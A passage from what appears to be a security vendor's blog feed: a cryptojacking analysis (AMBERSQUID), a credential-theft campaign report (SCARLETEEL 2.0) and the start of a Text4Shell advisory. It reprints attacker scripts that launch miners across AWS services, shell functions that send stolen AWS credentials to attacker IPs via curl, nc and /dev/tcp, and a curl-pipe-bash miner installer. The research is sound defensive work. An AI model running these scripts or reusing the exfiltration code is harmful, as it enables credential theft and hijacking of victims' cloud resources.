SGROUP=$(aws ec2 describe-security-groups --filters "Name=vpc-id,Values=$VPC" --query 'SecurityGroups[0].GroupId' | tr -d '"' 2> /dev/null)
SUBNET=$(aws ec2 describe-subnets --query 'Subnets[0].SubnetId' | tr -d '"' 2> /dev/null)
SUBNET1=$(aws ec2 describe-subnets --query 'Subnets[1].SubnetId' | tr -d '"' 2> /dev/null)
aws ecs create-service --cluster test --service-name test --task-definition test:1 --desired-count $COUNT --capacity-provider-strategy capacityProvider=FARGATE,weight=1 capacityProvider=FARGATE_SPOT,weight=1 --platform-version LATEST --network-configuration "awsvpcConfiguration={subnets=[$SUBNET,$SUBNET1],securityGroups=[$SGROUP],assignPublicIp=ENABLED}"
fi

According to the documentation, the desiredCount is “the number of instantiations of the specified task definition to place and keep running in your service. If the number of tasks running in a service drops below the desiredCount, Amazon ECS runs another copy of the task in the specified cluster.”
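
Taken together with the quota check above, the compute this buys the attacker is easy to quantify. Assuming every one of the 16 regions grants the full 30-task Fargate quota, with each task carrying 2 vCPUs:

```shell
# regions x tasks-per-region x vCPUs-per-task = concurrent mining vCPUs
echo $(( 16 * 30 * 2 ))
```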

The final entrypoint script, ulang.sh, runs restart.sh for every region. This script simply queries all the jobs of all the Amplify apps and, if their status is different from “RUNNING” and “PENDING,” it re-runs them.
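
The re-run logic in restart.sh reduces to a filter on job status. A minimal sketch of that logic follows; the aws CLI is stubbed out here, and the job names, statuses, and output format are illustrative rather than the actor's actual code:

```shell
# Stub standing in for `aws amplify list-jobs ...` output: "<job-id> <status>"
aws() {
  printf '%s\n' "job1 SUCCEED" "job2 RUNNING" "job3 FAILED"
}

# Re-run every job whose status is neither RUNNING nor PENDING
aws amplify list-jobs | while read -r job status; do
  case "$status" in
    RUNNING|PENDING) ;;            # leave in-flight jobs alone
    *) echo "re-run $job" ;;       # would call: aws amplify start-job ... (stubbed)
  esac
done
```

Note that even jobs that finished successfully are re-run, which is what keeps the miners cycling indefinitely.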

Codebuild scripts

AWS CodeBuild is a continuous integration (CI) service that can be used to compile and test source code and produce deployable artifacts without managing build servers. When creating a project, users can specify several settings in the build specification, including build commands.

This is where the attackers put the command to run their miner.

aws configure set region ap-south-1
aws codebuild create-project --name tost \
[...]

aws codebuild create-project --name tost1 \
[...]

aws codebuild create-project --name tost2 \
--source '{"type": "CODECOMMIT","location": "https://git-codecommit.ap-south-1.amazonaws.com/v1/repos/test","gitCloneDepth": 1,"gitSubmodulesConfig": {    "fetchSubmodules": false},"buildspec": "version: 0.2\nphases:\n  build:\n    commands:\n      - python3 index.py\n      - ./time","insecureSsl": false}' \
--source-version refs/heads/master \
--artifacts '{"type": "NO_ARTIFACTS"}' \
--environment '{"type": "LINUX_CONTAINER","image": "aws/codebuild/amazonlinux2-x86_64-standard:4.0","computeType": "BUILD_GENERAL1_LARGE","environmentVariables": [],"privilegedMode": false,"imagePullCredentialsType": "CODEBUILD"}' \
--service-role $ROLE_ARN \
--timeout-in-minutes 480 \
--queued-timeout-in-minutes 480 \
--logs-config '{"cloudWatchLogs": {"status": "ENABLED"},"s3Logs": {"status": "DISABLED","encryptionDisabled": false}}'


aws codebuild start-build --project-name tost1
aws codebuild start-build --project-name tost2
aws codebuild start-build --project-name tost

As shown above, the attackers create three new projects in each region with the previously created repository and run index.py when the project starts building. As with Amplify, the malicious code is executed inside build instances. The previous code snippet shows the specifications of the build: the OS, the Docker image to be used, its compute type, and information about the logs of the build project — in this case, CloudWatch.

Also, they set the “timeout-in-minutes” to 480 (8 hours). This parameter, according to the documentation, specifies “how long, in minutes, from 5 to 480 (8 hours), for CodeBuild to wait before it times out any build that has not been marked as completed.”

CloudFormation

AWS CloudFormation is an infrastructure as code service that allows users to deploy AWS and third-party resources via templates. Templates are text files that describe the resources to be provisioned in the AWS CloudFormation stacks. Stacks are collections of AWS resources that can be managed as single units. This means that users are able to operate directly with the stack instead of the single resources.

The attackers’ scripts create several CloudFormation stacks from a template that defines an EC2 Image Builder component. Within this component, they put commands to run a miner during the build phase of the image, similar to the commands that can be defined in a Dockerfile.

For each region, the script creates a CloudFormation stack and inserts the commands to run the miner inside the ImageBuilder component:

Component:
    Type: AWS::ImageBuilder::Component
    Properties:
      Name: HelloWorld-ContainerImage-Component
      Platform: Linux
      Version: 1.0.0
      Description: 'This is a sample component that demonstrates defining the build, validation, and test phases for an image build lifecycle'
      ChangeDescription: 'Initial Version'
      Data: |
        name: Hello World
        description: This is hello world component doc for Linux.
        schemaVersion: 1.0

        phases:
          - name: build
            steps:
              - name: donStep
                action: ExecuteBash
                inputs:
                  commands:
                    - sudo yum install wget unzip -y && wget --no-check-certificate https://github.com/meuryalos/profile/releases/download/1.0.0/test.zip && sudo unzip test.zip
          - name: validate
            steps:
              - name: buildStep
                action: ExecuteBash
                inputs:
                  commands:
                    - sudo ./start
                    - sudo timeout 48m ./time

They also specified the possible instance types for the build instance to be created:

BuildInstanceType:
    Type: CommaDelimitedList
    Default: "c5.xlarge,c5a.xlarge,r5.xlarge,r5a.xlarge"

Then, it creates eight EC2 image pipelines with the following input JSON file:

{
    "name": "task$i",
    "description": "Builds image",
    "containerRecipeArn": "$CONTAINER",
    "infrastructureConfigurationArn": "$INFRA",
    "distributionConfigurationArn": "$DISTRI",
    "imageTestsConfiguration": {
        "imageTestsEnabled": true,
        "timeoutMinutes": 60
    },
    "schedule": {
        "scheduleExpression": "cron(* 0/1 * * ?)",
        "pipelineExecutionStartCondition": "EXPRESSION_MATCH_ONLY"
    },
    "status": "ENABLED"
}

The most significant part of the previous code snippet is the cron expression since it tells the pipeline to start a new build every minute.
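
At that schedule, the build volume adds up quickly. With eight pipelines each firing every minute, the theoretical ceiling on queued builds is:

```shell
# minutes per day x pipelines = image builds queued per day (upper bound)
echo $(( 60 * 24 * 8 ))
```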

The attackers’ Docker images contain one of these JSON files, previously used in a real environment, which leaks an AWS Account ID (it might belong to one of the attackers’ testing environments):

{
    "name": "task8",
    "description": "Builds image",
    "containerRecipeArn": "arn:aws:imagebuilder:us-east-1:909030629651:container-recipe/amazonlinux2-container-recipe/1.0.0",
    "infrastructureConfigurationArn": "arn:aws:imagebuilder:us-east-1:909030629651:infrastructure-configuration/amazonlinux2-containerimage-infrastructure-configuration",
    "distributionConfigurationArn": "arn:aws:imagebuilder:us-east-1:909030629651:distribution-configuration/amazonlinux2-container-distributionconfiguration",
    "imageTestsConfiguration": {
        "imageTestsEnabled": true,
        "timeoutMinutes": 60
    },
    "schedule": {
        "scheduleExpression": "cron(* 0/1 * * ?)",
        "pipelineExecutionStartCondition": "EXPRESSION_MATCH_ONLY"
    },
    "status": "ENABLED"
}

EC2 Auto Scaling

Amazon EC2 Auto Scaling is a feature that allows users to handle the availability of compute capacity by adding or removing EC2 instances using scaling policies of their choice. Launch templates can be used to define the EC2 instances to be deployed.

The script scale.sh creates the following EC2 launch template for each region:

SCRIPT="c3VkbyB5dW0gaW5zdGFsbCBkb2NrZXIgLXkgJiYgc3VkbyBzZXJ2aWNlIGRvY2tlciBzdGFydCAmJiBzdWRvIGRvY2tlciBwdWxsIGRlbGJpZGFsdWFuL2VwaWN4ICYmIHN1ZG8gZG9ja2VyIHJ1biAtZCBkZWxiaWRhbHVhbi9lcGljeA=="

AMI=$(aws ec2 describe-images --filters "Name=manifest-location,Values=amazon/amzn2-ami-kernel-5.10-hvm-2.0.20230404.0-x86_64-gp2" --query 'Images[0].ImageId'| tr -d '"' 2> /dev/null)
export AMI
aws ec2 create-launch-template \
    --launch-template-name task \
    --version-description task \
    --launch-template-data '{"ImageId": "'$AMI'","UserData": "'$SCRIPT'","InstanceRequirements":{"VCpuCount":{"Min":4},"MemoryMiB":{"Min":8192}}}'

The instance AMI is Amazon Linux 2, with the minimum requirements set to 4 vCPU and 8 GB of memory. The Base64 decoded script inserted in the UserData contains the commands to run one of the attackers’ Docker images running a cryptominer:

sudo yum install docker -y && sudo service docker start && sudo docker pull delbidaluan/epicx && sudo docker run -d delbidaluan/epicx
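
The decoded command above can be reproduced with a single decode step, which is also how defenders can triage any suspicious UserData blob (the base64 string below is the SCRIPT value from scale.sh):

```shell
SCRIPT="c3VkbyB5dW0gaW5zdGFsbCBkb2NrZXIgLXkgJiYgc3VkbyBzZXJ2aWNlIGRvY2tlciBzdGFydCAmJiBzdWRvIGRvY2tlciBwdWxsIGRlbGJpZGFsdWFuL2VwaWN4ICYmIHN1ZG8gZG9ja2VyIHJ1biAtZCBkZWxiaWRhbHVhbi9lcGljeA=="

# Decode the UserData payload embedded in the launch template
echo "$SCRIPT" | base64 -d
```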

Then, the script creates two auto scaling groups, named “task” and “task1,” that spin up instances using the previous launch template as shown below:

aws autoscaling create-auto-scaling-group --auto-scaling-group-name task --vpc-zone-identifier "$SUBNET,$SUBNET1" --cli-input-json '{"DesiredCapacityType":"units","MixedInstancesPolicy":{"LaunchTemplate":{"LaunchTemplateSpecification":{"LaunchTemplateName":"task","Version":"1"},"Overrides":[{"InstanceRequirements":{"VCpuCount":{"Min":4},"MemoryMiB":{"Min":8192},"CpuManufacturers":["intel","amd"]}}]},"InstancesDistribution":{"OnDemandPercentageAboveBaseCapacity":100,"SpotAllocationStrategy":"capacity-optimized","OnDemandBaseCapacity":8,"OnDemandPercentageAboveBaseCapacity":100}},"MinSize":8,"MaxSize":8,"DesiredCapacity":8,"DesiredCapacityType":"units"}'
aws autoscaling create-auto-scaling-group --auto-scaling-group-name task1 --vpc-zone-identifier "$SUBNET,$SUBNET1" --cli-input-json '{"DesiredCapacityType":"units","MixedInstancesPolicy":{"LaunchTemplate":{"LaunchTemplateSpecification":{"LaunchTemplateName":"task","Version":"1"},"Overrides":[{"InstanceRequirements":{"VCpuCount":{"Min":4},"MemoryMiB":{"Min":8192},"CpuManufacturers":["intel","amd"]}}]},"InstancesDistribution":{"OnDemandPercentageAboveBaseCapacity":0,"SpotAllocationStrategy":"capacity-optimized","OnDemandBaseCapacity":0,"OnDemandPercentageAboveBaseCapacity":0}},"MinSize":8,"MaxSize":8,"DesiredCapacity":8,"DesiredCapacityType":"units"}'

Each group includes eight instances: the first group has only On-Demand Instances (“OnDemandPercentageAboveBaseCapacity” is set to 100) while the second group has only Spot Instances (“OnDemandPercentageAboveBaseCapacity” is set to 0). Also, by setting “SpotAllocationStrategy” to “capacity-optimized,” the attackers choose the strategy that has the lowest risk of interruption according to the documentation.

Sagemaker

Amazon SageMaker is a platform to build, train, and deploy machine learning (ML) models. Users can write code to train, deploy, and validate models with notebook instances that are ML compute instances running the Jupyter Notebook App. For every notebook instance, users can define a lifecycle configuration, which is a collection of shell scripts that run upon the creation or start of a notebook instance. This is precisely where the attackers put the script to run their miner after creating several notebook instances with the same configuration.

For each region, the attacker runs note.sh. This script creates a SageMaker notebook instance with type ml.t3.medium. The “OnStart” field in the configuration contains “a shell script that runs every time you start a notebook instance,” and here they inserted the following commands encoded in base64 to run the miner:

sudo yum install docker -y && sudo service docker start && sudo docker pull delbidaluan/note && sudo docker run -d delbidaluan/note

Other scripts

salah.sh (“salah” means “wrong” in Indonesian) is run for each region and in turn runs delete.sh. This script deletes all the CodeCommit repositories previously created.

stoptrigger.sh is run for each region and stops Glue triggers.

Cost to the Victim

Given the number of services used in this operation, we wanted to simulate the cost this would entail for a victim. These estimates make assumptions about regions and scale, both of which can easily be changed by the attacker.

| Service | Deployment | Cost/day |
| --- | --- | --- |
| Amplify (pricing) | 8 regions x 5 apps x 1440 min | $576 |
| CodeBuild (pricing) | 8 regions x 3 projects (small, medium, and large) x 1440 min | $403 |
| CloudFormation (pricing) | 8 regions x 8 tasks (c5.xlarge, c5a.xlarge, r5.xlarge, r5a.xlarge) x (0.2 * 24 h) | $307 |
| SageMaker (pricing) | 4 regions x 8 instances (ml.t3.2xlarge) x (0.399 * 24 h) | $306 |
| EC2 Auto Scaling groups (pricing) | 4 regions x 16 instances x (0.2 * 24 h) | $307 |
| ECS (pricing) | 16 regions x 24 h x 30 tasks x (2 vCPU * 0.013 + 4 GB * 0.001) | $345 |
| Total | | $2,244 |

Another point to consider with the table above is that the default scripts are not operating at full power. For example, in some services they exploit only four regions, sometimes eight, and other times 16. The cost would be much higher if they always targeted all regions and scaled up their resource usage.
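
The per-service figures in the table reduce to straightforward arithmetic. A sketch reproducing two of the rows, using the table's own formulas (the unit prices, e.g. ~$0.013 per vCPU-hour and ~$0.001 per GB-hour for Fargate, are assumptions drawn from AWS public pricing at the time):

```shell
# ECS/Fargate row: 16 regions x 24 h x 30 tasks x (2 vCPU x $0.013 + 4 GB x $0.001)
ecs=$(awk 'BEGIN { print int(16 * 24 * 30 * (2*0.013 + 4*0.001)) }')

# EC2 Auto Scaling row: 4 regions x 16 instances x $0.2/h x 24 h
asg=$(awk 'BEGIN { print int(4 * 16 * 0.2 * 24) }')

echo "ECS: \$$ecs/day, Auto Scaling: \$$asg/day"
```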

Wallets and Revenues

| Cryptocurrency | Wallet addresses | Notes |
| --- | --- | --- |
| Zephyr | ZEPHYR2vyrpcg2e2sJaA88EM6aGaLCBdiYfiHffrs5b3Fa4p1qpoEPH4UabmhJr5YYF7CxJykLTJmESQWaB9ARNuhb6jvptapVq3v | Received: 3251.16 ZEPH = $6,924 |
| Tidecoin | TFrQ7u9spKk8MBgX6Bze3oxPbs3Yh1tAsq | Received: 250,381 TDC = $6,993 |
| Verus | RNu4dQGeFDSPP5iHthijkfnzgxcW2nPde9 | Received: 4561.913 VRSC = $1,916 |
| Monero | 89v8xC6Mu2tX27WZKhefTuSnN7f3JMHQSAuoD7ZRe1bV2wfExSTDZe4JwaM4qpjKAoWbAbbnqLBmGCFECiwnXdfSKHt85H3 (2miners), 8B7ommXjcEpTAHKFFyci1v5ADrqvEbphhHrzbBfJgvqjecbik7vcLonh8rYSstbBxgD8AccrJYEukDaXZB8ns3kTLiXL8BN (c3pool), 837MGitRYxgEV158RDenxVUfb5mN6qzz78Z1WeaDoiqC4K7H8Pj556vHJoVXL2MCJ5WCGVZTBiRmqJFxeJG3WSQmGKhPC31 (nanopool) | Paid: 17.636 XMR = $2,506 |
| QRL | Q010500bc3733dbd0576ca26a8595d59b577a4d1e09c019856abfa103b8f08ec0ed36735e0e2f35, Q01050074da7be4fe8216f789041227c08ccbf310617362641336e1f282c398937635a5d3ebbdbf | N/A |
| Bamboo | 007DE31E4FD8213FBCE3586A3D2260C962142BBC605BB41C41 | N/A |

Conclusion

Cloud Service Providers (CSPs) like AWS provide a vast array of different services for their customers. While most financially motivated attackers target compute services, such as EC2, it is important to remember that many other services also provide access to compute resources (albeit more indirectly). It is easy for these services to be overlooked from a security perspective since there is less visibility compared to that available through runtime threat detection.

All services provided by a CSP must be monitored for malicious use. If runtime threat detection isn’t possible, higher-level logging of service usage should be monitored in order to catch threats like AMBERSQUID. If malicious activity is detected, response actions should be taken quickly to disable the involved services and limit the damage. While this operation occurred on AWS, other CSPs could easily be the next target.

The post AWS’s Hidden Threat: AMBERSQUID Cloud-Native Cryptojacking Operation appeared first on Sysdig.

SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto
https://sysdig.com/blog/scarleteel-2-0/ Tue, 11 Jul 2023 10:00:00 +0000

SCARLETEEL, an operation reported on by the Sysdig Threat Research Team last February, continues to thrive, improve tactics, and steal proprietary data. Cloud environments are still their primary target, but the tools and techniques used have adapted to bypass new security measures, along with a more resilient and stealthy command and control architecture. AWS Fargate, a more sophisticated environment to breach, has also become a target as their new attack tools allow them to operate within that environment.

In their most recent activities, we saw a similar strategy to what was reported in the previous blog: compromise AWS accounts through exploiting vulnerable compute services, gain persistence, and attempt to make money using cryptominers. Had we not thwarted their attack, our conservative estimate is that their mining would have cost over $4,000 per day until stopped.

Having watched SCARLETEEL previously, we know that they are not only after cryptomining, but stealing intellectual property as well. In their recent attack, the actor discovered and exploited a customer mistake in an AWS policy which allowed them to escalate privileges to AdministratorAccess and gain control over the account, enabling them to then do with it what they wanted. We also watched them target Kubernetes in order to significantly scale their attack.

Operational Updates

We will go through the main attack, highlighting how it evolved compared to the attack reported in the last article. The enhancements include:

  • The scripts are aware of being in a Fargate-hosted container and can collect credentials there.
  • The actor escalated to admin in the victim’s AWS account and spun up EC2 instances running miners.
  • Tools and techniques were improved to expand both attack capabilities and defense evasion.
  • The actor attempted to exploit IMDSv2 in order to retrieve the token and then use it to retrieve the AWS credentials.
  • C2 domains changed multiple times, including the use of public services to send and retrieve data.
  • AWS CLI and Pacu were used on the exploited containers to further exploit AWS.
  • Peirates was used to further exploit Kubernetes.

Motivations

AWS Credentials

After exploiting some JupyterLab notebook containers deployed in a Kubernetes cluster, the SCARLETEEL operation proceeded with multiple types of attacks. One of the primary goals of those attacks was stealing AWS credentials to further exploit the victim’s AWS environment.

The actor leveraged several versions of scripts that steal credentials, employing different techniques and exfiltration endpoints. An old version of one of those scripts was posted on GitHub here. It is worth noting that the C2 address embedded in that script, 45[.]9[.]148[.]221, belongs to SCARLETEEL, as reported in our previous article.

Those scripts search for AWS credentials in different places: by contacting the instance metadata (both IMDSv1 and IMDSv2), in the filesystem, and in the Docker containers created in the target machine (even if they are not running).
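
The filesystem portion of that hunt boils down to walking well-known credential paths and grepping for key material. A minimal, defanged sketch of the technique follows; this is an illustration rather than the actor's code, and the demo directory it scans is created on the fly:

```shell
# Look for files that commonly hold AWS keys and report those that match.
hunt_creds() {
  local root="$1"
  find "$root" -type f \( -path '*.aws/credentials' -o -name '*.env' \) \
       2>/dev/null \
    | while read -r f; do
        grep -l -i 'aws_secret_access_key' "$f" 2>/dev/null
      done
}

# Demo against a scratch directory standing in for a compromised filesystem
demo=$(mktemp -d)
mkdir -p "$demo/.aws"
printf '[default]\naws_secret_access_key = EXAMPLEKEY\n' > "$demo/.aws/credentials"
hunt_creds "$demo"
```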

Looking at the exfiltration function, we can see that it sends the Base64-encoded stolen credentials to the C2 IP address. Interestingly, it uses shell built-ins to accomplish this instead of curl. This is a stealthier way to exfiltrate data, as it avoids curl and wget, which many tools specifically monitor.

send_aws_data(){
cat $CSOF
SEND_B64_DATA=$(cat $CSOF | base64 -w 0)
rm -f $CSOF
dload http://45.9.148.221/in/in.php?base64=$SEND_B64_DATA > /dev/null
}
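
The dload helper used above is not shown in the snippet, but downloaders built purely from bash built-ins typically rely on the /dev/tcp pseudo-device. The following is a sketch of the general technique, not the actor's actual implementation:

```shell
# Split an http:// URL and print the raw HTTP request that would be sent.
build_request() {
  local url="$1"
  local host="${url#http://}"; host="${host%%/*}"
  local path="/${url#http://*/}"
  printf 'GET %s HTTP/1.0\r\nHost: %s\r\n\r\n' "$path" "$host"
}

# Send it over bash's /dev/tcp pseudo-device: opening this path creates a TCP
# socket directly, so no curl or wget process ever appears for tools that
# watch process executions.
dload() {
  local url="$1"
  local host="${url#http://}"; host="${host%%/*}"
  exec 3<>"/dev/tcp/${host}/80"
  build_request "$url" >&3
  cat <&3
  exec 3<&-
}

build_request "http://45.9.148.221/in/in.php?base64=AAAA"
```

Calling `dload` with the exfiltration URL then performs the request with no external binaries involved.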

The Sysdig Threat Research Team analyzed several similar scripts that can be found on VirusTotal.

In those scripts, the previous function has different exfiltration endpoints. For instance, the following function sends the credentials to 175[.]102[.]182[.]6, 5[.]39[.]93[.]71:9999 and also uploads them to temp.sh:

send_aws_data(){
find /tmp/ -type f -empty -delete

SEND_B64_DATA=$(cat $CSOF | base64 -w 0)
curl -sLk -o /dev/null http://175.102.182.6/.bin/in.php?base64=$SEND_B64_DATA

SEND_AWS_DATA_NC=$(cat $CSOF | nc 5.39.93.71 9999)
SEND_AWS_DATA_CURL=$(curl --upload-file $CSOF https://temp.sh)
echo $SEND_AWS_DATA_NC
echo ""
echo $SEND_AWS_DATA_CURL
echo ""
rm -f $CSOF
}

Looking at those IP addresses, we can state that 175[.]102[.]182[.]6 belongs to the attackers, while 5[.]39[.]93[.]71:9999 is the IP address of termbin[.]com, a service that takes a string as input and returns a unique URL that displays that string when accessed, effectively providing data storage. This site was primarily used to exfiltrate data during the attack. Since the response sent from that IP is written only to STDOUT (as is the response from https://temp[.]sh/), this suggests that those attacks were either not fully automated or were acting on script output: the attacker read the unique URL in the terminal and accessed it to grab the credentials.

In some versions of the script, it tried to exploit IMDSv2 to retrieve the credentials of the node role, as shown below. IMDSv2 is often suggested as a solution to security issues with the metadata endpoint, but it is still able to be abused by attackers. It just requires an extra step, and its efficacy is highly dependent on configuration.

Specifically, the first call is used to retrieve the session token, which is then used to retrieve the AWS credentials. However, this attempt failed because the target machine was a container inside an EC2 instance with the default hop limit set to 1. Had the attackers been on the host itself, they would have succeeded in downloading the credentials. According to the AWS documentation, “In a container environment, if the hop limit is 1, the IMDSv2 response does not return because going to the container is considered an additional network hop.” Amazon recommends setting the hop limit to 2 in containers, which suggests this would be successful in many container environments.

In the containers which were using IMDSv1, the attackers succeeded in stealing the AWS credentials. Next, they installed AWS CLI binary and Pacu on the exploited containers and configured them with the retrieved keys. They used Pacu to facilitate the discovery and exploitation of privilege escalations in the victim’s AWS account.

The attacker was observed using the AWS client to connect to Russian systems which are compatible with the S3 protocol. The command below shows that they configured the keys for the Russian S3 environment with the “configure” command and then attempted to access their buckets.

By using the “--endpoint-url” option, they did not send the API requests to the default AWS service endpoints, but instead to hb[.]bizmrg[.]com, which redirects to mcs[.]mail[.]ru/storage, a Russian S3-compatible object storage service. These requests were not logged in the victim’s CloudTrail, since they went to the mcs[.]mail[.]ru site. This technique allows the attacker to use the AWS client to download their tools and exfiltrate data without raising suspicion. It is a variation of “Living off the Land,” since the AWS client is commonly installed on cloud systems.

Kubernetes

Other than stealing AWS credentials, the SCARLETEEL actor performed other attacks including targeting Kubernetes. In particular, they also leveraged peirates, a tool to further exploit Kubernetes. The “get secrets”, “get pods” and “get namespaces” APIs called in the screenshot below are part of the execution of peirates. This shows that the attackers are aware of Kubernetes in their attack chains and will attempt to exploit the environment.

DDoS-as-a-Service

In the same attack in which the actor used the AWS CLI pointing to their own cloud environment, they also downloaded and executed Pandora, malware belonging to the Mirai botnet. The Mirai malware primarily targets IoT devices connected to the internet and has been responsible for many large-scale DDoS attacks since 2016. This attack is likely part of a DDoS-as-a-Service campaign, where the attacker provides DDoS capabilities for money. In this case, the machine infected by the Pandora malware would become a node of the botnet, used by the attacker to target a victim chosen by a client.

Post Exploitation

Privilege Escalation

After collecting the AWS keys of the node role via instance metadata, the SCARLETEEL actor started conducting automated reconnaissance in the victim’s AWS environment. After some failed attempts to run EC2 instances, they tried to create access keys for all admin users. The victim used a specific naming convention for all of their admin accounts, similar to “adminJane,” “adminJohn,” etc. One of the accounts was inadvertently named inconsistently with this convention, using a capitalized ‘A,’ as in “AdminJoe.” This resulted in the following policy being bypassed by the attackers:

This policy denies the creation of access keys for any user whose username contains “admin.” Because the match is case-sensitive, it did not cover “AdminJoe,” and the attackers managed to gain access to that user by creating access keys for it.
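
The policy appears as a screenshot in the original post; its shape can be reconstructed roughly as follows (the account ID, statement ID, and exact wildcard pattern are assumptions, not the victim's verbatim document):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyAdminKeyCreation",
      "Effect": "Deny",
      "Action": "iam:CreateAccessKey",
      "Resource": "arn:aws:iam::123456789012:user/*admin*"
    }
  ]
}
```

Because the user path in the Resource element is matched case-sensitively, a pattern like this covers “adminJane” but not “AdminJoe,” which is exactly the gap the attackers found.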

Once the attacker obtained the admin access, their first objective was gaining persistence. Using the new admin privileges, the adversary created new users and a new set of access keys for all the users in the account, including admins. One of the users created was called “aws_support” which they switched to in order to conduct reconnaissance.

Cryptojacking

The next objective was financially motivated: cryptomining. With the admin access, the attacker created 42 instances of c5.metal/r5a.4xlarge in the compromised account by running the following script:

#!/bin/bash
ulimit -n 65535 ; export LC_ALL=C.UTF-8 ; export LANG=C.UTF-8
export PATH=$PATH:/var/bin:/bin:/sbin:/usr/sbin:/usr/bin
yum install -y bash curl;yum install -y docker;yum install -y openssh-server
apt update --fix-missing;apt install -y curl;apt install -y bash;apt install -y wget
apk update;apk add bash;apk add curl;apk add wget;apk add docker
if ! type docker; then curl -sLk $SRC/cmd/set/docker.sh | bash ; fi
export HOME=/root
curl -Lk http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 43Lfq18TycJHVR3AMews5C9f6SEfenZoQMcrsEeFXZTWcFW9jW7VeCySDm1L9n4d2JEoHjcDpWZFq6QzqN4QGHYZVaALj3U
history -cw
clear

The attacker was quickly caught due to the noise generated by spawning an excessive number of instances running miners. Once the attacker was caught and access to the admin account was limited, they started using the other newly created users, or the originally compromised account, for the same purposes: stealing secrets from Secrets Manager or updating SSH keys to launch new instances. The attacker failed to proceed due to lack of privileges.

Artifact Analysis

Analysis of the script .a.sh

Downloaded from: 175[.]102[.]182[.]6/.bin/.g/.a.sh

VirusTotal analysis: https://www.virustotal.com/gui/file/57ddc709bcfe3ade1dd390571622e98ca0f49306344d2a3f7ac89b77d70b7320

After installing curl, netcat, and AWS CLI, it tries to retrieve the EC2 instance details from the AWS metadata. The attacker tried to exploit IMDSv2 in order to retrieve the token and then use it to retrieve the AWS credentials.

Then, the script sends the credentials both via netcat and curl and removes evidence of this execution.

However, this execution terminated without success because of the IMDS version in use.

The attacker then immediately executed another script.

Analysis of the script .a.i.sh

Downloaded from: 175[.]102[.]182[.]6/.bin/.a.i.sh

This script is almost identical to the script published on GitHub.

It starts by deleting the current iptables rules, setting the firewall to be fully permissive:

Then, it launches the get_aws_data() function in order to retrieve EC2 instance security credentials. Various metadata endpoints are used to accomplish this task, but it also looks for another IP address: 169[.]254[.]170[.]2. This address is used by ECS tasks, including those running on AWS Fargate, allowing the script to collect credentials in containers hosted there as well.

In order to retrieve those credentials the script uses this bash function, which utilizes shell built-ins, with the aim of evading detection mechanisms based on more common tools, such as curl and wget.

The get_aws_data() function also searches for credentials in all Docker containers in the target machine (even if they are not running) and in the filesystem:

After writing all the retrieved keys and credentials into random filenames, the script calls send_aws_data() to exfiltrate them:

Finally, the script removes the evidence of the attack by calling the notraces() bash function:

Analysis of the script setup_c3pool_miner.sh

Downloaded from: c9b9-2001-9e8-8aa-f500-ce88-25db-3ce0-e7da[.]ngrok-free[.]app/setup_c3pool_miner.sh

VirusTotal analysis: https://www.virustotal.com/gui/file/2c2a4a8832a039726f23de8a9f6019a0d0f9f2e4dfe67f0d20a696e0aebc9a8f

It runs the miner with the wallet address belonging to SCARLETEEL:

This script also runs an Alpine Docker image, installing static-curl in it. Then, it removes the previous c3pool miner and kills any running xmrig processes before downloading an “advanced version” of xmrig:

As shown above, the miner is extracted into /root/.configure/. The miner binary is named containerd and is then executed. From containerd.log, this is the information about the miner:

The Monero miner is executed in the background, using the containerd name and a systemd service as a defense evasion technique:

Conclusion

The SCARLETEEL actors continue to operate against targets in the cloud, including AWS and Kubernetes. Since the last report, they have enhanced their toolkit to include multiple new tools and a new C2 infrastructure, making detection more difficult. Their preferred method of entry is exploitation of open compute services and vulnerable applications. There is a continued focus on monetary gain via cryptomining, but as we saw in the previous report, intellectual property is still a priority.

Defending against a threat like SCARLETEEL requires multiple layers of defense. Runtime threat detection and response is critical to understanding when an attack has occurred, but with tools like Vulnerability Management, CSPM, and CIEM, these attacks could be prevented. Missing any of these layers could open up an organization to a significant financial risk.

The post SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto appeared first on Sysdig.

Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell https://sysdig.com/blog/cve-2022-42889-text4shell/ Thu, 20 Oct 2022 07:52:04 +0000 https://sysdig.com/?p=57148 A new critical vulnerability CVE-2022-42889 a.k.a Text4shell, similar to the old Spring4shell and log4shell, was originally reported by Alvaro Muñoz...

The post Detecting and mitigating CVE-2022-42889 a.k.a. Text4shell appeared first on Sysdig.

A new critical vulnerability, CVE-2022-42889 a.k.a. Text4Shell, similar to the older Spring4Shell and Log4Shell, was originally reported by Alvaro Muñoz in the very popular Apache Commons Text library.

The vulnerability is rated critical, with a 9.8 severity score. It is a remote code execution (RCE) flaw that would permit attackers to execute arbitrary code on the machine and compromise the entire host.

Apache Commons Text versions 1.5 through 1.9 are affected, and the issue has been patched in version 1.10.

Preliminary

Apache Commons Text is a Java library described as “a library focused on algorithms working on strings.” We can see it as a general-purpose text manipulation toolkit.

Even if you have never used it directly, you may have run into Commons Text as a dependency in your code, or it might be used by an application currently running on your laptop or in your production environment.

The CVE-2022-42889 issue

The vulnerability affects the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to remote code execution. This is due to a logic flaw that makes the “script”, “dns” and “url” lookup keys interpolated by default, contrary to what the documentation of the StringLookupFactory class specifies. These keys allow an attacker to execute arbitrary code via lookups.
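To make the flaw concrete, here is a toy Python re-implementation of prefix-based lookups. This is NOT the actual Commons Text Java API, just a conceptual model of why interpolating “script”, “dns” and “url” by default is dangerous, and of how the fixed behavior (leaving those prefixes uninterpolated) closes the hole:

```python
import re

# Conceptual model only -- the real library is Java. Benign lookups return
# harmless strings; the dangerous prefixes would trigger code execution,
# DNS resolution, or URL fetches when interpolated.
SAFE_LOOKUPS = {"env": lambda v: "<env value>", "date": lambda v: "<formatted date>"}
DANGEROUS_PREFIXES = {"script", "dns", "url"}

def interpolate(template, allow_dangerous=True):
    def resolve(match):
        prefix, value = match.group(1), match.group(2)
        if prefix in DANGEROUS_PREFIXES:
            if allow_dangerous:           # pre-1.10 default behavior
                return f"<would evaluate {prefix}: {value!r}>"
            return match.group(0)         # fixed behavior: left as-is
        return SAFE_LOOKUPS.get(prefix, lambda v: match.group(0))(value)
    return re.sub(r"\$\{(\w+):([^}]*)\}", resolve, template)
```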

In order to exploit the vulnerability, the following requirements must be met:

  • Run a version of Apache Commons Text from version 1.5 to 1.9
  • Use the StringSubstitutor interpolator

